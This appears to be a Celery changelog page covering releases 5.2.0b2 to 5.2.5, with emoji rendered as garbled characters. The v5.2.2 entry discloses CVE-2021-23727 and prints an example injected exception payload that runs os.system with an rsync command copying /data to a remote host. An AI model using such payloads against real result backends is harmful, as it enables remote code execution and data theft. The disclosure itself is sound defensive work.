All Versions
Latest Version
Avg Release Cycle
28 days
Latest Release

Changelog History
Page 1

  • v5.2.5 Changes

    ๐Ÿš€ :release-date: 2022-4-03 20:42 P.M UTC+2:00 ๐Ÿš€ :release-by: Omer Katz

    • ๐Ÿ—„ Use importlib instead of deprecated pkg_resources (#7218).

    .. _version-5.2.4:

  • v5.2.4 Changes

    ๐Ÿš€ :release-date: 2022-4-03 20:30 P.M UTC+2:00 ๐Ÿš€ :release-by: Omer Katz

    • ๐Ÿ”ฆ Expose more debugging information when receiving unknown tasks (#7404).

    .. _version-5.2.3:

  • v5.2.3 Changes

    ๐Ÿš€ :release-date: 2021-12-29 12:00 P.M UTC+6:00 ๐Ÿš€ :release-by: Asif Saif Uddin

    • ๐Ÿ‘ Allow redis >= 4.0.2.
    • โฌ†๏ธ Upgrade minimum required pymongo version to 3.11.1.
    • โœ… tested pypy3.8 beta (#6998).
    • Split Signature.or into subclasses' or (#7135).
    • Prevent duplication in event loop on Consumer restart.
    • Restrict setuptools>=59.1.1,<59.7.0.
    • Kombu bumped to v5.2.3
    • py-amqp bumped to v5.0.9
    • ๐Ÿ‘ท Some docs & CI improvements.

    .. _version-5.2.2:

  • v5.2.2 Changes

    ๐Ÿš€ :release-date: 2021-12-26 16:30 P.M UTC+2:00 ๐Ÿš€ :release-by: Omer Katz

    • ๐Ÿ“š Various documentation fixes.
    • ๐Ÿ›  Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      .. code-block:: python

            "exc_module": "os",
            'exc_type': "system",
            "exc_message": "rsync /data [email protected]:~/data"

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

    .. _version-5.2.1:

  • v5.2.1 Changes

    ๐Ÿš€ :release-date: 2021-11-16 8.55 P.M UTC+6:00 ๐Ÿš€ :release-by: Asif Saif Uddin

    • ๐Ÿ›  Fix rstrip usage on bytes instance in ProxyLogger.
    • ๐ŸŒฒ Pass logfile to ExecStop in celery.service example systemd file.
    • ๐Ÿ›  fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • โฌ†๏ธ Bump min kombu version to 5.2.2.
    • ๐Ÿ”„ Change pytz>dev to a PEP 440 compliant pytz>
    • โœ‚ Remove dependency to case (#7077).
    • ๐Ÿ›  fix: task expiration is timezone aware if needed (#7065).
    • ๐ŸŽ‰ Initial testing of pypy-3.8 beta to CI.
    • ๐Ÿ“„ Docs, CI & tests cleanups.

    .. _version-5.2.0:

  • v5.2.0 Changes

    ๐Ÿš€ :release-date: 2021-11-08 7.15 A.M UTC+6:00 ๐Ÿš€ :release-by: Asif Saif Uddin

    • Prevent from subscribing to empty channels (#7040)
    • ๐Ÿ›  fix register_task method.
    • ๐Ÿšฆ Fire task failure signal on final reject (#6980)
    • Limit pymongo version: <3.12.1 (#7041)
    • โฌ†๏ธ Bump min kombu version to 5.2.1

    .. _version-5.2.0rc2:

  • v5.2.0.rc2 Changes

    ๐Ÿš€ :release-date: 2021-11-02 1.54 P.M UTC+3:00 ๐Ÿš€ :release-by: Naomi Elstein

    • โฌ†๏ธ Bump Python 3.10.0 to rc2.
    • โšก๏ธ [] pre-commit autoupdate (#6972).
    • autopep8.
    • ๐Ÿ‘ท Prevent worker to send expired revoked items upon hello command (#6975).
    • ๐Ÿ“„ docs: clarify the 'keeping results' section (#6979).
    • ๐Ÿ“š Update deprecated task module removal in 5.0 documentation (#6981).
    • โšก๏ธ [] pre-commit autoupdate.
    • try python 3.10 GA.
    • mention python 3.10 on readme.
    • 0๏ธโƒฃ Documenting the default consumer_timeout value for rabbitmq >= 3.8.15.
    • Azure blockblob backend parametrized connection/read timeouts (#6978).
    • โž• Add as_uri method to azure block blob backend.
    • โž• Add possibility to override backend implementation with celeryconfig (#6879).
    • โšก๏ธ [] pre-commit autoupdate.
    • ๐Ÿ—„ try to fix deprecation warning.
    • โšก๏ธ [] pre-commit autoupdate.
    • not needed anyore.
    • not needed anyore.
    • not used anymore.
    • โž• add github discussions forum

    .. _version-5.2.0rc1:

  • v5.2.0.rc1 Changes

    ๐Ÿš€ :release-date: 2021-09-26 4.04 P.M UTC+3:00 ๐Ÿš€ :release-by: Omer Katz

    • ๐Ÿ‘ท Kill all workers when main process exits in prefork model (#6942).
    • โœ… test kombu 5.2.0rc1 (#6947).
    • try moto 2.2.x (#6948).
    • ๐Ÿš€ Prepared Hacker News Post on Release Action.
    • โšก๏ธ update setup with python 3.7 as minimum.
    • โšก๏ธ update kombu on setupcfg.
    • โž• Added note about automatic killing all child processes of worker after its termination.
    • โšก๏ธ [] pre-commit autoupdate.
    • ๐Ÿšš Move importskip before greenlet import (#6956).
    • amqp: send expiration field to broker if requested by user (#6957).
    • โš  Single line drift warning.
    • canvas: fix kwargs argument to prevent recursion (#6810) (#6959).
    • ๐Ÿ‘ Allow to enable Events with app.conf mechanism.
    • Warn when expiration date is in the past.
    • โž• Add the Framework :: Celery trove classifier.
    • Give indication whether the task is replacing another (#6916).
    • ๐Ÿ‘‰ Make executable.
    • โฌ†๏ธ Bump version: 5.2.0b3 โ†’ 5.2.0rc1.

    .. _version-5.2.0b3:

  • v5.2.0.b3 Changes

    ๐Ÿš€ :release-date: 2021-09-02 8.38 P.M UTC+3:00 ๐Ÿš€ :release-by: Omer Katz

    • โž• Add args to LOG_RECEIVED (fixes #6885) (#6898).
    • ๐Ÿ‘ท Terminate job implementation for eventlet concurrency backend (#6917).
    • โž• Add cleanup implementation to filesystem backend (#6919).
    • โšก๏ธ [] pre-commit autoupdate (#69).
    • โž• Add before_start hook (fixes #4110) (#6923).
    • Restart consumer if connection drops (#6930).
    • โœ‚ Remove outdated optimization documentation (#6933).
    • โž• added https verification check functionality in arangodb backend (#6800).
    • โฌ‡๏ธ Drop Python 3.6 support.
    • โšก๏ธ update supported python versions on readme.
    • โšก๏ธ [] pre-commit autoupdate (#6935).
    • โœ‚ Remove appveyor configuration since we migrated to GA.
    • โฌ†๏ธ pyugrade is now set to upgrade code to 3.7.
    • โฌ‡๏ธ Drop exclude statement since we no longer test with pypy-3.6.
    • ๐Ÿ‘ 3.10 is not GA so it's not supported yet.
    • ๐Ÿ‘ Celery 5.1 or earlier support Python 3.6.
    • ๐Ÿ›  Fix linting error.
    • ๐Ÿ›  fix: Pass a Context when chaining fail results (#6899).
    • โฌ†๏ธ Bump version: 5.2.0b2 โ†’ 5.2.0b3.

    .. _version-5.2.0b2:

  • v5.2.0.b2 Changes

    ๐Ÿš€ :release-date: 2021-08-17 5.35 P.M UTC+3:00 ๐Ÿš€ :release-by: Omer Katz

    • ๐Ÿ Test windows on py3.10rc1 and pypy3.7 (#6868).
    • Route chord_unlock task to the same queue as chord body (#6896).
    • โž• Add message properties to app.tasks.Context (#6818).
    • ๐Ÿ– handle already converted LogLevel and JSON (#6915).
    • 5.2 is codenamed dawn-chorus.
    • โฌ†๏ธ Bump version: 5.2.0b1 โ†’ 5.2.0b2.

    .. _version-5.2.0b1: